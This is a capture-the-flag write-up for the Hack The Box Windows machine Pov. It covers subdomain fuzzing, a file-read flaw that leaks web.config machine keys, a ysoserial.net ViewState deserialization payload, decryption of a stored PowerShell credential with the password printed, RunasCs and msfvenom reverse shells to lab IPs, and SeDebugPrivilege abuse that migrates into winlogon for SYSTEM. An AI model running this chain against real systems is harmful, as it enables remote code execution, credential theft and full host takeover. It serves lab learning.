# HTB - Pov

> ### IP Address: 10.10.11.251

### **Machine Info**

Pov is a medium Windows machine that starts with a webpage featuring a business site. Enumerating the initial webpage, an attacker is able to find the subdomain `dev.pov.htb`. Navigating to the newly discovered subdomain, a `download` option is vulnerable to remote file read, giving an attacker the means to get valuable information from the `web.config` file. The subdomain uses the `ViewState` mechanism, which, in combination with the secrets leaked from the `web.config` file, is vulnerable to insecure deserialization, leading to remote code execution as the user `sfitz`. Looking at the remote filesystem, an attacker can discover and manipulate a file that reveals the credentials for the user `alaading`. Once the attacker has code execution as the user `alaading` the `SeDebugPrivilege` is abused to gain code execution in the context of a privileged application, ultimately resulting in code execution as `nt authority\system`.

### **Enumeration**

#### Nmap Scan

```
┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov]
└─$ nmap -F $ip -Pn         

PORT   STATE SERVICE
80/tcp open  http

┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov]
└─$ nmap -p- --min-rate 2500  $ip -Pn

PORT   STATE SERVICE
80/tcp open  http

┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov]
└─$ nmap -sC -sV -p80 $ip

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: pov.htb
|_http-server-header: Microsoft-IIS/10.0
```

#### Fuzz for subdomains

```
┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://pov.htb/ -H 'Host: FUZZ.pov.htb'  

dev        [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 131ms]
```

#### Add to /etc/hosts

```
┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov]
└─$ sudo sh -c "echo '10.10.11.251 pov.htb dev.pov.htb' >> /etc/hosts"
```

#### LFI

<figure><img src="/files/3SGAsS2wuBsiBI1z19RV" alt=""><figcaption></figcaption></figure>

#### web.config

<figure><img src="/files/NJhoe3rzuWkUy9QyIFvr" alt=""><figcaption></figcaption></figure>

With the `machineKey` secrets leaked from `web.config` (the validation and decryption keys and their algorithms), I can craft a malicious .NET serialized object for the `__VIEWSTATE` parameter with ysoserial.net and attempt to get RCE.

### **Shell as pov\sfitz**

#### **Creating the serialized object with ysoserial.net**

```bash
.\ysoserial.exe -p ViewState -g WindowsIdentity --path="/portfolio" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" -validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --validationalg="SHA1" -c "powershell -c powershell -e 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"

rQkpxoUR3biNzp3mTLbIkpX1ROXuVDredVARBpljCQ7S2YdpUGClf67G8NN%2FRnU8uksJYAl3lw5oPGmxJ6MCPRjOs58yA3RgtaCZ5q16sVjLv9qbHP%2FDm1ONIo5ElkOt5GpqVPmnmqIvBZtMEk8mMlVCkucZgpdnkDTO428lWjsVJxfvEZgOX0Tj2BK8uvPpCPvlyjAS02gCiXpBQgkFfUF3UXgpxK2L9OVQ%2BK88H5zHd1fHXc4HC8ritovqr%2B%2F%2F1cpGGc4ThrdP%2BpEA95zs2%2BBvy0lBdnR6h3N7w6Gb7p%2FDcX%2BZtzC7C0hMJbX41iNu%2FCmqAYROEu%2Bs1hVH%2BVmmk1SbRgqTHV8JmrDWRbP7OCfqiYJynyEIOAGAMXcfkbf5luNmXzvIchTv6TXaL84uQ6rEcbRCHtmanA5OMpnpG%2Bhf77NyMOIKRIhLRLV8Aucp4irZ0FjXi9AZv9jmbmJZ9prZ%2F7x0aSROdwlUVLuJWl4O7J5INEer0m%2FJuCQNx9X1mxer%2FblF8GeKJkNIBiPQhCvHj159AxmRGEyogoQBlSEP5glWyzZf2IyH9CIPyz4aQGHU2JYFtm5VXyH%2F4J15b8vb0m2dEbk0Htmp9BfPAOjAFuPsgfyzIa1PyYeCn5DdV1ZAHPgogqDEtEjg1qKrUkXMx8Ve0XfUBvuvExNuiaWuidnNpl31D44PdkvTdsoUG0nBO6NxP%2BgQF90GjKYKX57JTB%2Bleth446Nee2TDpTHLSf6hRnzqnbLAmaevDu37NjlvCJstCGqesPtSs8yqmGXFSOu%2BJNOnLTYcrr41eGGpqDhMULGF%2FHnBRHGaCY3PJzjhyn9PBb1oaMCuccWiJnmkpaB8TwXrow5VrT0l02LMk1JtBcNJO5NC5sMrA8vthZXmL4cwHFZ6Z20rrAS3JNt3cAEW1qLjyTRJvKh7aHEiIZ25R2P8yvKGxSDHpCIKKhjXGwbkr0qULbH8NqB6Au30RWaqZF6WNrqqBwiD%2By49zy6y0K%2Bs1WLi821Nwp6TVPvs%2Bok9a0rMN4QgaExyA1qAv6JwxEkdBJltVMH8ymbM26sLMCi7Ui2ya6Eq5x5BVVl97AsLiFqUTGdJOgdEMhO%2FNyHO4iuemFuUHTpMMdeIOOt%2F7%2Fjh2yje%2Bqe7x2dhpER63%2FTsiiSyCnTZSdt4T0Iy8o0t%2BkE9d%2B%2BLvrhlTQNRe8wanrnScyDOmXG2rUu5bfLbXS8BTPjF5DwryUUGikcOxoovIckg32OyPwkMRLomJ0yZoIWzkQBIgJ61JZfhJ%2BH0FcARRF%2BbA3G83D0s3Mtmg2QHojtXtSQ8EtBWfJqjyfm0oA5%2FaeNfsKp5EuKXxqiIKmmaOPN1onN2pVxOH5fAtGfa2tZFx0b3FStcsNOeHJ6z2HNOSNXq6Kdn3WgC7COcowAlTNJBwrbp3xp71wl5cKwGcvmacnpqBIoACD9IMSRGViRBhqA138Kv2jO0t7x7a9FC9z0on3NPkI%2Fg3RRiKyWHjXcMQWLetSMQouqSZOm7pXt7%2F90vVc3KfUGXJkYNcgpJD9MCv2VpERQ9Cwu7HHKkdlxefX5gVwadNUj3g1nPa9Xsw2cgezQYySNof5kBCOSCvgPT2kKuAPb%2BZhNxwQRkwqXN4ChhI9WitDdpWKAfPBST%2B8hRrG2D0IVOYhRuVnHBMIjAfh4XI05D8w3f9SghrgrRckvY%2F02jjrZ2UqBBnDiqf8WLLwqXZWAM3oTT7z5Mn3gie8EyLFv6iFd9wGutmE2nCMMw8Pe8eZqgJWyy6vy0KGCk3hVzoFfcf2MlsB5ZP2SzlNAQKfd%2F6fFi8ohFNXYGi0TBXkuczRA7WXr6etUu43MzcQWNDBMSQ882nuslcNC2Ba5fXVWGbGNtgo2m5liiVYH3uv2KH3379e6OsbH6a%2F448A
8f9eSQp2cFYezM8y869EMH9bXpQtUZtZ0PrrERBc80sEQI3Op%2BkF%2BfizdfHG0sszoGYkyUWfTKb3%2F0g66Qv4FN%2BON0Nm91Z27%2FHfGmWwjwlAhrxoGAxuK7GFRSa3ZREnqSsY1JpoNpz%2FImUDgI9VyVISRTiZ8AJEkbyCW3unN7xYsmNFMvrbGbxrykNU0i%2BxQHeAx7QsZ9DsmPH4syCg2QjQ%2FCiQk8vQVKNZNvd2r82hFygg5%2BWnE4QmEv483HMiIJIXb1h9sd25Y%2BkI%2Bk3oiMgOGHiyceZG54%2By5H9AOUEFUp81K1GQiNtyN9%2B646lfN4T%2FoGyPuAQgkaokAxy69Gb7Jqi6OvG5iAoKYsf0kvfibmQ7QQ7ZsTxyo%2FlKACfBLnFyHCRnSJxnu3W%2B21W%2BlJ7TE6A1fpEHkD6NM6ATHvUT7lcPl9mZca6HUNgzJ8lIFDDaLl1fEDBCJeTXytbjZ%2BnAB2lsJDww9iHjIv2Ujtsax80RiIXFet5A4uUFii4M6vEkQ8wCE119R%2FoYfvd5QedvOr5LIvrXJlqn5MDkfMvxzeEidK7i2poJeH7p6eIioyhA814mDZyyImrhqFX11lEOWTZLhvrbp%2BaUzgM9n7hkvnDNcYSbibBWH57zKsMqEstEdFSc%2BPs2ancizWrodNMhG34elppw3DK8trdoR6PQPsxf8Fw1QitDBFjdD2UuRGj7gF7VODq5JLnVsK9F%2BqW6tTe2WMPfhxQVJ1Z1Wc%2BfbEfo93ClmWteISv9KwlRe%2FMH%2FX0vS%2BkhzkzkDg%2BYFrXT1V1WlAQOC9eZpdytkeGvnY67IgtI8mNVMhd3mMcVS7iA362AhEC6%2FTzgvyMW8xdNiY%2BkN30FRpngvPGIcyBK%2FOPdpo881EWtTkqaitxxgNuOW5%2BpWFbfReBsVQSKEknlnf414S3nT7Ng8t1kT2U7PzYNdXUli9F81fEh7MXPfuhQBXuh0hk13zy70AV0a0FLT1l%2BlA2BRYfOlDvDm5HE0zWBJOLgII2AgQGRmUmDup3w%2FdULgdH9e8xEXMVne1X9HRLpmeILfauTYai2tXPwOt2N1wlJvRiNg4adbugqpeGm%2FRBvPx5Glg3AcDSJmBFEcF9fr2ZYn%2BzB8CCOSaHe%2FkqImP9FW4z0T%2FshjgStQarppt25pnsqCkwdHr3cpX53nu6SOqg7U%2BANFhdkuVDR4vY%2BhfaOJi44RANAACBpy14aeibWyHqKz%2BzwrS453%2BT1UJw5eMwHtTKl6ETBhLibBR%2BBX0jZWWpaD7VIxFQKIMbdkvuaVludGedKGTaeoSIKBYK5cN%2B7FlfVUI7%2FwHoEUt1cH3u6GtdOwm5wxWFGXMvPNWMDFzzkZAibylrClRjqxJbAqf3ijXuTKxXCQBu6rJxHioZq3pTh1ruLTNzLIKQ%2FScRGKuLaqNd0mSQI6rSnp0mdSBnD%2FgW10bcRKESfOWvFD1yTUSPCI3ujU6T0tP%2BQaOzhcuoZpMjVlbUAJv%2BS43SF42d2CdyvWib4GcKCPH6yRNwsKJrcfFl3DPvmlZcN9TfIJaZ9q2VeQyU2WaRK3YL83hme53lxFi4G2ySbPAu8tzoPgOCWb0n6pnsQFOLQ%2FoQ4KAYEpZH2Tn4%2BejZlj%2BHZrfBZi9a67Cxvvmq61ipj6HGBSfgfMO7VrxfhUlE2f2nR76jwF8BZ1XlvEKNg9H1HKtbgg%2F7KUvDgWfBFXpWdkuWy5QlCjRKlJ3mu%2F%2FEJStdP%2FEL%2BmbJG7u0A38hJxdrKwmvPJvVlbfxGjq2WNC8qvsdV9mODugxnMm2K%2F8IOJM8zkTTRlJR4m3i79Dgci56Ty5umrn744ok8j79FX8llxpIvxAG96Oixtl%2BPx6%2FjpG9D6toA5p9cdy%2BtFm%2
F7UH53uH61JAp0Z3W6BWScN9dMohd5VuG7bzublkTYzAQZw7QEvh3TKncKJhahGJige7WoidZQTLmVqzFnY9cx9x0So3FsS5mTcxf%2FxqbeALEZeofjrWaFhEMidOFbYLjfVA26smK0TS1VJz4BKp7LJNn4ca0vJ5pDQnEqqqDFdd1fNkPW1SIcRMlphq%2B%2Fzw3ZUboL0sBZsFXS%2FDBbfQogDLICmqc%2FTyVeNT8y2coocraBASh1hYKeXTJ%2FYvCHxa6GWljDtsyEg3oZ5P1LWWTxf3i4drwsDuD8C8kngaeJdD%2By5lwyKFnFPZh%2BTVwaRbAaJWNF5cQYdIg68MIJVWnxyDgpxWIXRYQJDaIoe1sstBLGJbCfUhOg%2Ft4WYazlX1LxLgvG4mMU2AL7PoRoXPm91NDJaNH52GiiLhTsNbZqbkhwROu4XGkqW07iw5wsRYnGWv%2F5TPEdQ%3D
```

**I inject the object above into the `__VIEWSTATE` parameter of a POST to `/portfolio` (the same path given to `--path`) and get a shell as `sfitz`.**

### **Shell as alaading**

```powershell
PS C:\users\sfitz\documents> ls

    Directory: C:\users\sfitz\documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       12/25/2023   2:26 PM           1838 connection.xml
```

It is a `PSCredential` object exported with `Export-Clixml` for the user `alaading`:

```xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
    </Props>
  </Obj>
</Objs>
```

* PowerShell credential objects are often exported this way in scripting and automation tasks, as a convenient way to keep a password out of the script itself.
* The `SecureString` is protected with [DPAPI](https://en.wikipedia.org/wiki/Data_Protection_API), which typically means it can only be decrypted by the same user on the same computer it was created on. Since the file sits in `sfitz`'s profile and we have a shell as `sfitz`, `Import-Clixml` can unwrap it directly.

```powershell
PS C:\users\sfitz\documents> $credential = Import-Clixml -Path 'C:\users\sfitz\documents\connection.xml'
PS C:\users\sfitz\documents> $credential.GetNetworkCredential().username
PS C:\users\sfitz\documents> $credential.GetNetworkCredential().password
```

```
alaading:f8gQ8fynP44ek1m3
```

```powershell
PS C:\users\sfitz\documents> .\RunasCs.exe alaading f8gQ8fynP44ek1m3 PowerShell.exe -r 10.10.16.21:443
```

### **I'm the Administrator :)**

* With `SeDebugPrivilege`, a user can open any process on the host with full access, including processes running as `NT AUTHORITY\SYSTEM`. That allows dumping `lsass.exe` memory to recover secrets and hashes, or injecting into a SYSTEM process to inherit its token.
* To get code execution as SYSTEM, start a meterpreter session as `alaading` and migrate into `winlogon.exe`, which runs as SYSTEM, from Metasploit.

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9001 -f exe -o shell.exe

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set LPORT 9001
msf6 exploit(multi/handler) > run
```

```bash
meterpreter > ps winlogon

PID  PPID  Name          Arch  Session  User                 Path
---  ----  ----          ----  -------  ----                 ----
548  468   winlogon.exe  x64   1        NT AUTHORITY\SYSTEM  C:\Windows\System32\winlogon.exe

meterpreter > migrate 548
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
```

<figure><img src="/files/gsCfjNMLousBqwXD5aBc" alt=""><figcaption></figcaption></figure>
